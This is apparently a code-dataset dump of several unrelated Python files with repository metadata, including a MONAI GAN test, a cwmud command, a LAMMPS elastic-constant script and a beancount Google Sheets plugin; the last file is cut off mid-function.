metapattern = np.zeros((patternsize, patternsize))
for cell in np.reshape(cells, (-1, 3)):
selx = cell[0] - selection[0]
sely = cell[1] - selection[1]
metapattern[sely][selx] += 16 * cell[2]
if sely:
if selx:
metapattern[sely - 1][selx - 1] += 8
if selx + 1 < selw:
metapattern[sely - 1][selx + 1] += 4
if sely + 1 < selh:
if selx:
metapattern[sely + 1][selx - 1] += 2
if selx + 1 < selw:
metapattern[sely + 1][selx + 1] += 1
metapattern[metapattern < 32] = np.nan
metapattern += 5630 - 32
metapattern[np.isnan(metapattern)] = 0
metapattern = metapattern.astype(int)
def createLine(pattern, outfile, linenum = [5726], memo = {}):
if tuple(pattern.ravel().tolist()) not in memo:
if pattern.shape[0] == 2:
outfile.write('{} {} {} {} {}\n'.format(pattern.shape[0].bit_length() + 10,
pattern[0, 0],
pattern[0, 1],
pattern[1, 0],
pattern[1, 1]))
else:
subpatterns = pattern.reshape(2, pattern.shape[0] >> 1, 2, pattern.shape[0] >> 1).swapaxes(1,2)
outfile.write('{} {} {} {} {}\n'.format(pattern.shape[0].bit_length() + 10,
createLine(subpatterns[0, 0], outfile),
createLine(subpatterns[0, 1], outfile),
createLine(subpatterns[1, 0], outfile),
createLine(subpatterns[1, 1], outfile)))
memo[tuple(pattern.ravel().tolist())] = linenum[0]
linenum[0] += 1
return memo[tuple(pattern.ravel().tolist())]
copyfile('metatemplate11.mc', 'output.mc')
with open('output.mc', 'a') as outputfile:
createLine(metapattern, outputfile)
g.addlayer()
g.open('output.mc')
| true
| true
|
790b221d069713fd8fd1b1bc68f98ddc02ba0302
| 1,420
|
py
|
Python
|
Tests/test_CuInsAsmRepos_sm50.py
|
gxsaccount/CuAssembler
|
4542a3ee3fe4788bfd368a337e4c89ee288f0684
|
[
"MIT"
] | 100
|
2020-08-03T03:03:02.000Z
|
2022-03-23T15:46:58.000Z
|
Tests/test_CuInsAsmRepos_sm50.py
|
gxsaccount/CuAssembler
|
4542a3ee3fe4788bfd368a337e4c89ee288f0684
|
[
"MIT"
] | 6
|
2021-05-17T07:24:05.000Z
|
2022-02-08T11:29:44.000Z
|
Tests/test_CuInsAsmRepos_sm50.py
|
gxsaccount/CuAssembler
|
4542a3ee3fe4788bfd368a337e4c89ee288f0684
|
[
"MIT"
] | 25
|
2020-08-03T03:03:15.000Z
|
2022-02-24T12:57:40.000Z
|
# -*- coding: utf-8 -*-
from CuAsm.CuInsAssemblerRepos import CuInsAssemblerRepos
from CuAsm.CuInsFeeder import CuInsFeeder
def constructReposFromFile(sassname, savname=None, arch='sm_75'):
# initialize a feeder with sass
feeder = CuInsFeeder(sassname, arch=arch)
# initialize an empty repos
repos = CuInsAssemblerRepos(arch=arch)#
# Update the repos with instructions from feeder
repos.update(feeder)
# reset the feeder back to start
# feeder.restart()
# verify the repos
    # actually the code is already verified during repos construction
# repos.verify(feeder)
if savname is not None:
repos.save2file(savname)
return repos
def verifyReposFromFile(sassname, reposfile, arch='sm_75'):
# initialize a feeder with sass
feeder = CuInsFeeder(sassname, arch=arch)
# initialize an empty repos
repos = CuInsAssemblerRepos(reposfile, arch=arch)#
# verify the repos
repos.verify(feeder)
if __name__ == '__main__':
sassname = r"G:\\Temp\\NVSASS\\cudnn64_7.sm_50.sass"
# sassname = r'G:\\Temp\\Program.45.sm_50.sass'
reposfile = r'InsAsmRepos.sm_50.txt'
arch = 'sm_50'
constructReposFromFile(sassname, reposfile, arch=arch)
print('### Construction done!')
# verifyReposFromFile(sassname, reposfile, arch=arch)
# print('### Verification done!')
| 27.307692
| 70
| 0.672535
|
from CuAsm.CuInsAssemblerRepos import CuInsAssemblerRepos
from CuAsm.CuInsFeeder import CuInsFeeder
def constructReposFromFile(sassname, savname=None, arch='sm_75'):
feeder = CuInsFeeder(sassname, arch=arch)
repos = CuInsAssemblerRepos(arch=arch)
repos.update(feeder)
if savname is not None:
repos.save2file(savname)
return repos
def verifyReposFromFile(sassname, reposfile, arch='sm_75'):
feeder = CuInsFeeder(sassname, arch=arch)
repos = CuInsAssemblerRepos(reposfile, arch=arch)
repos.verify(feeder)
if __name__ == '__main__':
sassname = r"G:\\Temp\\NVSASS\\cudnn64_7.sm_50.sass"
reposfile = r'InsAsmRepos.sm_50.txt'
arch = 'sm_50'
constructReposFromFile(sassname, reposfile, arch=arch)
print('### Construction done!')
| true
| true
|
790b222ea040908137c4f4b9fa62ce4fe964d3f9
| 5,498
|
py
|
Python
|
tests/test_integration_workflows_gan.py
|
Can-Zhao/MONAI
|
e29ef022b97a4e809dd22d4d208005f541ee061b
|
[
"Apache-2.0"
] | 3
|
2020-06-22T20:59:14.000Z
|
2021-04-09T21:24:45.000Z
|
tests/test_integration_workflows_gan.py
|
Borda/MONAI
|
e0db5a564225a7cb62e7a23df97267019006302f
|
[
"Apache-2.0"
] | null | null | null |
tests/test_integration_workflows_gan.py
|
Borda/MONAI
|
e0db5a564225a7cb62e7a23df97267019006302f
|
[
"Apache-2.0"
] | 1
|
2020-05-27T12:53:58.000Z
|
2020-05-27T12:53:58.000Z
|
# Copyright (c) MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os
import shutil
import sys
import tempfile
import unittest
from glob import glob
import nibabel as nib
import numpy as np
import torch
import monai
from monai.data import create_test_image_2d
from monai.engines import GanTrainer
from monai.engines.utils import GanKeys as Keys
from monai.handlers import CheckpointSaver, StatsHandler, TensorBoardStatsHandler
from monai.networks import normal_init
from monai.networks.nets import Discriminator, Generator
from monai.transforms import AsChannelFirstd, Compose, LoadImaged, RandFlipd, ScaleIntensityd, ToTensord
from monai.utils import set_determinism
from tests.utils import DistTestCase, TimedCall, skip_if_quick
def run_training_test(root_dir, device="cuda:0"):
real_images = sorted(glob(os.path.join(root_dir, "img*.nii.gz")))
train_files = [{"reals": img} for img in zip(real_images)]
# prepare real data
train_transforms = Compose(
[
LoadImaged(keys=["reals"]),
AsChannelFirstd(keys=["reals"]),
ScaleIntensityd(keys=["reals"]),
RandFlipd(keys=["reals"], prob=0.5),
ToTensord(keys=["reals"]),
]
)
train_ds = monai.data.CacheDataset(data=train_files, transform=train_transforms, cache_rate=0.5)
train_loader = monai.data.DataLoader(train_ds, batch_size=2, shuffle=True, num_workers=4)
learning_rate = 2e-4
betas = (0.5, 0.999)
real_label = 1
fake_label = 0
# create discriminator
disc_net = Discriminator(
in_shape=(1, 64, 64), channels=(8, 16, 32, 64, 1), strides=(2, 2, 2, 2, 1), num_res_units=1, kernel_size=5
).to(device)
disc_net.apply(normal_init)
disc_opt = torch.optim.Adam(disc_net.parameters(), learning_rate, betas=betas)
disc_loss_criterion = torch.nn.BCELoss()
def discriminator_loss(gen_images, real_images):
real = real_images.new_full((real_images.shape[0], 1), real_label)
gen = gen_images.new_full((gen_images.shape[0], 1), fake_label)
realloss = disc_loss_criterion(disc_net(real_images), real)
genloss = disc_loss_criterion(disc_net(gen_images.detach()), gen)
return torch.div(torch.add(realloss, genloss), 2)
# create generator
latent_size = 64
gen_net = Generator(
latent_shape=latent_size, start_shape=(latent_size, 8, 8), channels=[32, 16, 8, 1], strides=[2, 2, 2, 1]
)
gen_net.apply(normal_init)
gen_net.conv.add_module("activation", torch.nn.Sigmoid())
gen_net = gen_net.to(device)
gen_opt = torch.optim.Adam(gen_net.parameters(), learning_rate, betas=betas)
gen_loss_criterion = torch.nn.BCELoss()
def generator_loss(gen_images):
output = disc_net(gen_images)
cats = output.new_full(output.shape, real_label)
return gen_loss_criterion(output, cats)
key_train_metric = None
train_handlers = [
StatsHandler(
name="training_loss", output_transform=lambda x: {Keys.GLOSS: x[Keys.GLOSS], Keys.DLOSS: x[Keys.DLOSS]}
),
TensorBoardStatsHandler(
log_dir=root_dir,
tag_name="training_loss",
output_transform=lambda x: {Keys.GLOSS: x[Keys.GLOSS], Keys.DLOSS: x[Keys.DLOSS]},
),
CheckpointSaver(
save_dir=root_dir, save_dict={"g_net": gen_net, "d_net": disc_net}, save_interval=2, epoch_level=True
),
]
disc_train_steps = 2
num_epochs = 5
trainer = GanTrainer(
device,
num_epochs,
train_loader,
gen_net,
gen_opt,
generator_loss,
disc_net,
disc_opt,
discriminator_loss,
d_train_steps=disc_train_steps,
latent_shape=latent_size,
key_train_metric=key_train_metric,
train_handlers=train_handlers,
)
trainer.run()
return trainer.state
@skip_if_quick
class IntegrationWorkflowsGAN(DistTestCase):
def setUp(self):
set_determinism(seed=0)
self.data_dir = tempfile.mkdtemp()
for i in range(40):
im, _ = create_test_image_2d(64, 64, num_objs=3, rad_max=14, num_seg_classes=1, channel_dim=-1)
n = nib.Nifti1Image(im, np.eye(4))
nib.save(n, os.path.join(self.data_dir, f"img{i:d}.nii.gz"))
self.device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu:0")
monai.config.print_config()
logging.basicConfig(stream=sys.stdout, level=logging.INFO)
def tearDown(self):
set_determinism(seed=None)
shutil.rmtree(self.data_dir)
@TimedCall(seconds=200, daemon=False)
def test_training(self):
torch.manual_seed(0)
finish_state = run_training_test(self.data_dir, device=self.device)
# assert GAN training finished
self.assertEqual(finish_state.iteration, 100)
self.assertEqual(finish_state.epoch, 5)
if __name__ == "__main__":
unittest.main()
| 34.3625
| 115
| 0.684613
|
import logging
import os
import shutil
import sys
import tempfile
import unittest
from glob import glob
import nibabel as nib
import numpy as np
import torch
import monai
from monai.data import create_test_image_2d
from monai.engines import GanTrainer
from monai.engines.utils import GanKeys as Keys
from monai.handlers import CheckpointSaver, StatsHandler, TensorBoardStatsHandler
from monai.networks import normal_init
from monai.networks.nets import Discriminator, Generator
from monai.transforms import AsChannelFirstd, Compose, LoadImaged, RandFlipd, ScaleIntensityd, ToTensord
from monai.utils import set_determinism
from tests.utils import DistTestCase, TimedCall, skip_if_quick
def run_training_test(root_dir, device="cuda:0"):
real_images = sorted(glob(os.path.join(root_dir, "img*.nii.gz")))
train_files = [{"reals": img} for img in zip(real_images)]
train_transforms = Compose(
[
LoadImaged(keys=["reals"]),
AsChannelFirstd(keys=["reals"]),
ScaleIntensityd(keys=["reals"]),
RandFlipd(keys=["reals"], prob=0.5),
ToTensord(keys=["reals"]),
]
)
train_ds = monai.data.CacheDataset(data=train_files, transform=train_transforms, cache_rate=0.5)
train_loader = monai.data.DataLoader(train_ds, batch_size=2, shuffle=True, num_workers=4)
learning_rate = 2e-4
betas = (0.5, 0.999)
real_label = 1
fake_label = 0
disc_net = Discriminator(
in_shape=(1, 64, 64), channels=(8, 16, 32, 64, 1), strides=(2, 2, 2, 2, 1), num_res_units=1, kernel_size=5
).to(device)
disc_net.apply(normal_init)
disc_opt = torch.optim.Adam(disc_net.parameters(), learning_rate, betas=betas)
disc_loss_criterion = torch.nn.BCELoss()
def discriminator_loss(gen_images, real_images):
real = real_images.new_full((real_images.shape[0], 1), real_label)
gen = gen_images.new_full((gen_images.shape[0], 1), fake_label)
realloss = disc_loss_criterion(disc_net(real_images), real)
genloss = disc_loss_criterion(disc_net(gen_images.detach()), gen)
return torch.div(torch.add(realloss, genloss), 2)
latent_size = 64
gen_net = Generator(
latent_shape=latent_size, start_shape=(latent_size, 8, 8), channels=[32, 16, 8, 1], strides=[2, 2, 2, 1]
)
gen_net.apply(normal_init)
gen_net.conv.add_module("activation", torch.nn.Sigmoid())
gen_net = gen_net.to(device)
gen_opt = torch.optim.Adam(gen_net.parameters(), learning_rate, betas=betas)
gen_loss_criterion = torch.nn.BCELoss()
def generator_loss(gen_images):
output = disc_net(gen_images)
cats = output.new_full(output.shape, real_label)
return gen_loss_criterion(output, cats)
key_train_metric = None
train_handlers = [
StatsHandler(
name="training_loss", output_transform=lambda x: {Keys.GLOSS: x[Keys.GLOSS], Keys.DLOSS: x[Keys.DLOSS]}
),
TensorBoardStatsHandler(
log_dir=root_dir,
tag_name="training_loss",
output_transform=lambda x: {Keys.GLOSS: x[Keys.GLOSS], Keys.DLOSS: x[Keys.DLOSS]},
),
CheckpointSaver(
save_dir=root_dir, save_dict={"g_net": gen_net, "d_net": disc_net}, save_interval=2, epoch_level=True
),
]
disc_train_steps = 2
num_epochs = 5
trainer = GanTrainer(
device,
num_epochs,
train_loader,
gen_net,
gen_opt,
generator_loss,
disc_net,
disc_opt,
discriminator_loss,
d_train_steps=disc_train_steps,
latent_shape=latent_size,
key_train_metric=key_train_metric,
train_handlers=train_handlers,
)
trainer.run()
return trainer.state
@skip_if_quick
class IntegrationWorkflowsGAN(DistTestCase):
def setUp(self):
set_determinism(seed=0)
self.data_dir = tempfile.mkdtemp()
for i in range(40):
im, _ = create_test_image_2d(64, 64, num_objs=3, rad_max=14, num_seg_classes=1, channel_dim=-1)
n = nib.Nifti1Image(im, np.eye(4))
nib.save(n, os.path.join(self.data_dir, f"img{i:d}.nii.gz"))
self.device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu:0")
monai.config.print_config()
logging.basicConfig(stream=sys.stdout, level=logging.INFO)
def tearDown(self):
set_determinism(seed=None)
shutil.rmtree(self.data_dir)
@TimedCall(seconds=200, daemon=False)
def test_training(self):
torch.manual_seed(0)
finish_state = run_training_test(self.data_dir, device=self.device)
self.assertEqual(finish_state.iteration, 100)
self.assertEqual(finish_state.epoch, 5)
if __name__ == "__main__":
unittest.main()
| true
| true
|
790b228e8aa5bf49b0e1e3268923018c40afca2b
| 753
|
py
|
Python
|
cwmud/core/commands/info/look.py
|
whutch/cwmud
|
bee8b126a5e70edd0593dae9753a6be8d52357cf
|
[
"MIT"
] | 11
|
2016-03-03T03:56:59.000Z
|
2021-11-19T15:38:51.000Z
|
cwmud/core/commands/info/look.py
|
whutch/atria
|
bee8b126a5e70edd0593dae9753a6be8d52357cf
|
[
"MIT"
] | 26
|
2016-08-31T23:19:45.000Z
|
2019-10-19T21:50:33.000Z
|
cwmud/core/commands/info/look.py
|
whutch/atria
|
bee8b126a5e70edd0593dae9753a6be8d52357cf
|
[
"MIT"
] | 2
|
2016-01-22T21:22:34.000Z
|
2016-02-09T06:03:57.000Z
|
# -*- coding: utf-8 -*-
"""Look command."""
# Part of Clockwork MUD Server (https://github.com/whutch/cwmud)
# :copyright: (c) 2008 - 2017 Will Hutcheson
# :license: MIT (https://github.com/whutch/cwmud/blob/master/LICENSE.txt)
from .. import Command, COMMANDS
from ...characters import CharacterShell
@COMMANDS.register
class LookCommand(Command):
"""A command to allow a character to look at things."""
def _action(self):
char = self.session.char
if not char:
self.session.send("You're not playing a character!")
return
if not char.room:
self.session.send("You're not in a room!")
return
char.show_room()
CharacterShell.add_verbs(LookCommand, "look", "l")
| 26.892857
| 73
| 0.640106
|
from .. import Command, COMMANDS
from ...characters import CharacterShell
@COMMANDS.register
class LookCommand(Command):
def _action(self):
char = self.session.char
if not char:
self.session.send("You're not playing a character!")
return
if not char.room:
self.session.send("You're not in a room!")
return
char.show_room()
CharacterShell.add_verbs(LookCommand, "look", "l")
| true
| true
|
790b22f67984acbc1adc70e328564f8496f2231c
| 2,925
|
py
|
Python
|
examples/elastic.py
|
costrouc/pymatgen-lammps
|
0e1aee4c4c93a62ac3648086d3007be7c2ce20a1
|
[
"MIT"
] | 3
|
2020-07-01T07:59:42.000Z
|
2022-01-19T07:19:08.000Z
|
examples/elastic.py
|
costrouc/pymatgen-lammps
|
0e1aee4c4c93a62ac3648086d3007be7c2ce20a1
|
[
"MIT"
] | null | null | null |
examples/elastic.py
|
costrouc/pymatgen-lammps
|
0e1aee4c4c93a62ac3648086d3007be7c2ce20a1
|
[
"MIT"
] | 4
|
2020-07-26T03:30:52.000Z
|
2021-08-09T21:26:00.000Z
|
# Calculation the Elastic Constants from given deformations
import os
import subprocess
from pymatgen import Structure, Lattice, Specie
from pymatgen.analysis.elasticity import DeformedStructureSet, Strain, Stress, ElasticTensor
from pmg_lammps import RelaxSet, LammpsLog, LammpsData, LammpsPotentials
supercell = (5, 5, 5)
a = 4.1990858 # From evaluation of potential
lattice = Lattice.from_parameters(a, a, a, 90, 90, 90)
mg = Specie('Mg', 1.4)
o = Specie('O', -1.4)
atoms = [mg, o]
sites = [[0, 0, 0], [0.5, 0.5, 0.5]]
structure = Structure.from_spacegroup(225, lattice, atoms, sites)
initial_structure = structure * supercell
directory = 'runs/elastic'
num_normal = 10
num_shear = 10
max_normal = 0.03
max_shear = 0.08
lammps_potentials = LammpsPotentials(pair={
(mg, mg): '1309362.2766468062 0.104 0.0',
(mg, o ): '9892.357 0.20199 0.0',
(o , o ): '2145.7345 0.3 30.2222'
})
mgo_potential_settings = [
('pair_style', 'buck/coul/long 10.0'),
('kspace_style', 'pppm 1.0e-5'),
]
print('Performing Strained Calculations')
strained_structures = []
deformation_set = DeformedStructureSet(structure, nd=max_normal, ns=max_shear,
num_norm=num_normal, num_shear=num_shear)
for i, deformation in enumerate(deformation_set.deformations):
deformation_directory = os.path.join(directory, str(i))
print('Deformation', i)
strain = Strain.from_deformation(deformation)
strained_structure = deformation.apply_to_structure(initial_structure)
lammps_data = LammpsData.from_structure(strained_structure, potentials=lammps_potentials,
include_charge=True)
lammps_set = RelaxSet(lammps_data, relax_box=False, user_lammps_settings=[
] + mgo_potential_settings)
lammps_set.write_input(deformation_directory)
subprocess.call(['lammps', '-i', 'lammps.in'], cwd=deformation_directory, stdout=subprocess.PIPE)
lammps_log = LammpsLog(os.path.join(deformation_directory, 'lammps.log'))
stress = Stress(lammps_log.get_stress(-1))
strained_structures.append({
'strain': strain,
        'structure': strained_structure,
'stress': stress / -10000.0 # bar to GPa
})
strains = [defo['strain'] for defo in strained_structures]
stresses = [defo['stress'] for defo in strained_structures]
elastic = ElasticTensor.from_pseudoinverse(strains, stresses)
print('Stiffness Tensor')
for row in elastic.voigt:
print('{:+8.1f} {:+8.1f} {:+8.1f} {:+8.1f} {:+8.1f} {:+8.1f}\n'.format(*row))
print('Shear Modulus G_V', elastic.g_voigt)
print('Shear Modulus G_R', elastic.g_reuss)
print('Shear Modulus G_vrh', elastic.g_vrh)
print('Bulk Modulus K_V', elastic.k_voigt)
print('Bulk Modulus K_R', elastic.k_reuss)
print('Bulk Modulus K_vrh', elastic.k_vrh)
print('Elastic Anisotropy', elastic.universal_anisotropy)
print("Poisson's Ratio", elastic.homogeneous_poisson)
| 35.240964
| 101
| 0.709744
|
import os
import subprocess
from pymatgen import Structure, Lattice, Specie
from pymatgen.analysis.elasticity import DeformedStructureSet, Strain, Stress, ElasticTensor
from pmg_lammps import RelaxSet, LammpsLog, LammpsData, LammpsPotentials
supercell = (5, 5, 5)
a = 4.1990858
lattice = Lattice.from_parameters(a, a, a, 90, 90, 90)
mg = Specie('Mg', 1.4)
o = Specie('O', -1.4)
atoms = [mg, o]
sites = [[0, 0, 0], [0.5, 0.5, 0.5]]
structure = Structure.from_spacegroup(225, lattice, atoms, sites)
initial_structure = structure * supercell
directory = 'runs/elastic'
num_normal = 10
num_shear = 10
max_normal = 0.03
max_shear = 0.08
lammps_potentials = LammpsPotentials(pair={
(mg, mg): '1309362.2766468062 0.104 0.0',
(mg, o ): '9892.357 0.20199 0.0',
(o , o ): '2145.7345 0.3 30.2222'
})
mgo_potential_settings = [
('pair_style', 'buck/coul/long 10.0'),
('kspace_style', 'pppm 1.0e-5'),
]
print('Performing Strained Calculations')
strained_structures = []
deformation_set = DeformedStructureSet(structure, nd=max_normal, ns=max_shear,
num_norm=num_normal, num_shear=num_shear)
for i, deformation in enumerate(deformation_set.deformations):
deformation_directory = os.path.join(directory, str(i))
print('Deformation', i)
strain = Strain.from_deformation(deformation)
strained_structure = deformation.apply_to_structure(initial_structure)
lammps_data = LammpsData.from_structure(strained_structure, potentials=lammps_potentials,
include_charge=True)
lammps_set = RelaxSet(lammps_data, relax_box=False, user_lammps_settings=[
] + mgo_potential_settings)
lammps_set.write_input(deformation_directory)
subprocess.call(['lammps', '-i', 'lammps.in'], cwd=deformation_directory, stdout=subprocess.PIPE)
lammps_log = LammpsLog(os.path.join(deformation_directory, 'lammps.log'))
stress = Stress(lammps_log.get_stress(-1))
strained_structures.append({
'strain': strain,
        'structure': strained_structure,
'stress': stress / -10000.0
})
strains = [defo['strain'] for defo in strained_structures]
stresses = [defo['stress'] for defo in strained_structures]
elastic = ElasticTensor.from_pseudoinverse(strains, stresses)
print('Stiffness Tensor')
for row in elastic.voigt:
print('{:+8.1f} {:+8.1f} {:+8.1f} {:+8.1f} {:+8.1f} {:+8.1f}\n'.format(*row))
print('Shear Modulus G_V', elastic.g_voigt)
print('Shear Modulus G_R', elastic.g_reuss)
print('Shear Modulus G_vrh', elastic.g_vrh)
print('Bulk Modulus K_V', elastic.k_voigt)
print('Bulk Modulus K_R', elastic.k_reuss)
print('Bulk Modulus K_vrh', elastic.k_vrh)
print('Elastic Anisotropy', elastic.universal_anisotropy)
print("Poisson's Ratio", elastic.homogeneous_poisson)
| true
| true
|
790b24e08d1689ac5a8a136a2200ec96e8902f61
| 9,780
|
py
|
Python
|
src/coolbeans/plugins/sheetsaccount.py
|
runarp/coolbeans
|
128a7f2e45690d2d22b05608e555c44334f46859
|
[
"MIT"
] | 5
|
2020-05-17T04:48:25.000Z
|
2022-01-27T09:36:45.000Z
|
src/coolbeans/plugins/sheetsaccount.py
|
runarp/coolbeans
|
128a7f2e45690d2d22b05608e555c44334f46859
|
[
"MIT"
] | 1
|
2020-05-17T06:21:52.000Z
|
2020-05-22T13:49:33.000Z
|
src/coolbeans/plugins/sheetsaccount.py
|
runarp/coolbeans
|
128a7f2e45690d2d22b05608e555c44334f46859
|
[
"MIT"
] | 1
|
2021-01-28T03:00:27.000Z
|
2021-01-28T03:00:27.000Z
|
"""
# Sheets Account
Read a Google Sheet as if it were a realtime source of transactions
for a GL account. Columns are mapped to attributes. The
assumption is that the sheet maps to a single account, and the
rows are the credit/debits to that account.
Can be used as a plugin, which will write new entries (for reference)
to a file, but also maintain a "live" view of the transactions.
We support most of the sane columns on a sheet:
- date
- narration
- payee
- account
- amount
- currency
- tags
- links
- Anything else, if non-empty cell, gets added as a META
Some things to look at are:
- Multi-currency Support
- Lot support?
- Other Directives: Note, Document, Balance?
- Smarter per-sheet caching of local results
I strongly suggest using "Transfer" accounts for all asset movements between
two accounts both of which are tracked via a Sheet. This simplifies the
"Matching" and allows each side to be reconciled independently.
TODO: Default Account when account column is blank?
"""
# stdlib imports
import logging
import decimal
import pprint
import typing
import datetime
import dateparser
import pathlib
import slugify
# Beancount imports
from beancount.core import data
from coolbeans.utils import safe_plugin, get_setting
from coolbeans.tools.sheets import google_connect, safe_open_sheet
from coolbeans.plugins.accountsync import apply_coolbean_settings
import gspread
STRIP_SYMOLS = '₱$'
DEFAULT_CURRENCY = "USD"
logger = logging.getLogger(__name__)
__plugins__ = ['apply_coolbean_settings', 'remote_entries_plugin']
def clean_slug(slug):
"""Clean a possible Slug string to remove dashes and lower case."""
return slug.replace('-', '').lower()
def coolbean_sheets(entries, context):
"""Given a set of entries, pull out any slugs and add them to the context"""
settings = context.setdefault('coolbean-accounts', {})
# Pull out any 'slug' meta data
for entry in entries:
if isinstance(entry, data.Open):
document = entry.meta.get('document_name', None)
tab = entry.meta.get('document_tab', None)
slug = entry.meta.get('slug', "")
if document and tab and slug:
settings[slug] = {
'account': entry.account,
'document': document,
'tab': tab,
'currencies': entry.currencies
}
else:
if document or tab:
print(f"Skipping {entry.account}: {document}/{tab}/{slug}")
return entries, []
def remote_entries(entries, options_map):
"""
@param entries:
@param options_map:
@return:
"""
errors = []
settings = options_map['coolbeans']
secrets_file = get_setting('google-apis', settings)
connection = google_connect(secrets_file)
new_entries_path = None
new_entries_file = get_setting('new-entries-bean', settings)
if new_entries_file:
new_entries_path = pathlib.Path(new_entries_file)
# Capture the configuration off the Open
remote_accounts = {}
for entry in entries:
if not isinstance(entry, data.Open):
continue
document_name = entry.meta.get('document_name', None)
default_currency = entry.currencies[0] if entry.currencies else DEFAULT_CURRENCY
if document_name:
options = dict(
document_name=document_name,
document_tab=entry.meta.get('document_tab', None),
reverse_amount=entry.meta.get('reverse', False),
default_currency=default_currency,
entry=entry,
entry_file=new_entries_path
)
remote_accounts[entry.account] = options
new_entries = []
for account, options in remote_accounts.items():
try:
new_entries += load_remote_account(
connection=connection,
errors=errors,
account=account,
options=options
)
except Exception as exc:
logger.error(f"while processing {account}", exc_info=exc)
if new_entries and new_entries_path:
from beancount.parser import printer
with new_entries_path.open("w") as stream:
printer.print_entries(new_entries, file=stream)
logger.info(f"Wrote {len(new_entries)} new account(s) to {new_entries_path}.")
return entries+new_entries, errors
remote_entries_plugin = safe_plugin(remote_entries)
ALIASES = {
'narration': ['description', 'notes', 'details', 'memo']
}
def clean_record(record: typing.Dict[str, str]):
"""This is a bit of a hack. But using get_all_records doesn't leave many
options"""
new_record = {}
for k, v in record.items():
k = slugify.slugify(k.lower().strip())
v = str(v)
# Combine multiple narration columns if needed:
for field, names in ALIASES.items():
new_record.setdefault(field, '')
if k in names:
# Add the value to Narration:
new_record[field] += ('. ' if new_record[field] else '') + v
k = None # Clear this Key
break
        # Really ugly hack around embedded currency symbols. Needs cleanup.
if k == 'amount':
v = v.replace(',', '')
for s in STRIP_SYMOLS:
v = v.replace(s, '')
if v and not v[0].isdecimal() and not v[0]=='-':
v = v[1:]
# Pull currency?
# Decimal is fussy
try:
v = decimal.Decimal(v)
except decimal.InvalidOperation:
v = 0
if k:
new_record[k] = v
return new_record
def load_remote_account(
connection: gspread.Client,
errors: list,
account: str,
options: typing.Dict[str, str]
):
"""Try to Load Entries from URL into Account.
options include:
- document_name -- the Actual Google Doc name
- document_tab -- the Tab name on the Doc
- default_currency - the entry currency if None is provided
- reverse_amount - if true, assume positive entries are credits
"""
entries = []
document_name = options['document_name']
document_tab = options.get('document_tab', 0) or 0
default_currency = options['default_currency']
reverse_amount = options.get('reverse_amount', False)
if not document_name:
return
m = -1 if reverse_amount else 1
logger.info(f"Attempting to download entries for {account} from {document_name}.{document_tab}")
workbook = connection.open(document_name)
sheet = None
try:
document_tab = int(document_tab)
sheet = workbook.get_worksheet(document_tab)
except ValueError:
pass
if sheet is None:
sheet = workbook.worksheet(document_tab)
records = sheet.get_all_records()
import re
row = 0
# logger.info(f"Found {len(records)} entries.")
for record in records:
row += 1
record = clean_record(record)
if 'date' not in record or not record['date']:
continue
if 'amount' not in record or not record['amount']:
continue
#if 'account' not in record or not record['account'].strip():
# continue
narration = record.pop('narration', None)
payee = record.pop('payee', None)
tagstr = record.pop('tags', '')
tags = set(re.split(r'\W+', tagstr)) if tagstr else set()
date = dateparser.parse(record.pop('date'))
if date:
date = datetime.date(year=date.year, month=date.month, day=date.day)
linkstr = record.pop('links', '')
links = set(re.split(r'\W+', linkstr)) if linkstr else set()
meta = {
'filename': str(options['entry_file']),
'lineno': 0,
'document-sheet-row': f"{document_name}/{document_tab}/{row+1}"
}
amount = decimal.Decimal(record.pop('amount')) * m
currency = record.pop('currency', default_currency)
entry_account = record.pop('account')
for k, v in record.items():
if v:
meta[k] = v
try:
if not entry_account:
errors.append(f"Skipping Record with Blank Account: {meta['document-sheet-row']}")
logger.warning(f"Skipping Record with Blank Account: {meta['document-sheet-row']}")
continue
entry = data.Transaction(
date=date,
narration=narration,
payee=payee,
tags=tags,
meta=meta,
links=links,
flag='*',
postings=[
data.Posting(
account=account,
units=data.Amount(amount, currency),
cost=None,
price=None,
flag='*',
meta={}
),
data.Posting(
account=entry_account,
units=data.Amount(-amount, currency),
cost=None,
price=None,
flag='*',
meta={}
)
]
)
entries.append(entry)
except Exception as exc:
logger.error(f"Error while parsing {record}", exc_info=exc)
errors.append(str(exc))
logger.info(f"Loaded {len(entries)} entries for {account} from {document_name}.{document_tab}")
return entries
| 31.650485
| 100
| 0.58456
|
import logging
import decimal
import pprint
import typing
import datetime
import dateparser
import pathlib
import slugify
from beancount.core import data
from coolbeans.utils import safe_plugin, get_setting
from coolbeans.tools.sheets import google_connect, safe_open_sheet
from coolbeans.plugins.accountsync import apply_coolbean_settings
import gspread
STRIP_SYMOLS = '₱$'
DEFAULT_CURRENCY = "USD"
logger = logging.getLogger(__name__)
__plugins__ = ['apply_coolbean_settings', 'remote_entries_plugin']
def clean_slug(slug):
return slug.replace('-', '').lower()
def coolbean_sheets(entries, context):
settings = context.setdefault('coolbean-accounts', {})
for entry in entries:
if isinstance(entry, data.Open):
document = entry.meta.get('document_name', None)
tab = entry.meta.get('document_tab', None)
slug = entry.meta.get('slug', "")
if document and tab and slug:
settings[slug] = {
'account': entry.account,
'document': document,
'tab': tab,
'currencies': entry.currencies
}
else:
if document or tab:
print(f"Skipping {entry.account}: {document}/{tab}/{slug}")
return entries, []
def remote_entries(entries, options_map):
errors = []
settings = options_map['coolbeans']
secrets_file = get_setting('google-apis', settings)
connection = google_connect(secrets_file)
new_entries_path = None
new_entries_file = get_setting('new-entries-bean', settings)
if new_entries_file:
new_entries_path = pathlib.Path(new_entries_file)
remote_accounts = {}
for entry in entries:
if not isinstance(entry, data.Open):
continue
document_name = entry.meta.get('document_name', None)
default_currency = entry.currencies[0] if entry.currencies else DEFAULT_CURRENCY
if document_name:
options = dict(
document_name=document_name,
document_tab=entry.meta.get('document_tab', None),
reverse_amount=entry.meta.get('reverse', False),
default_currency=default_currency,
entry=entry,
entry_file=new_entries_path
)
remote_accounts[entry.account] = options
new_entries = []
for account, options in remote_accounts.items():
try:
new_entries += load_remote_account(
connection=connection,
errors=errors,
account=account,
options=options
)
except Exception as exc:
logger.error(f"while processing {account}", exc_info=exc)
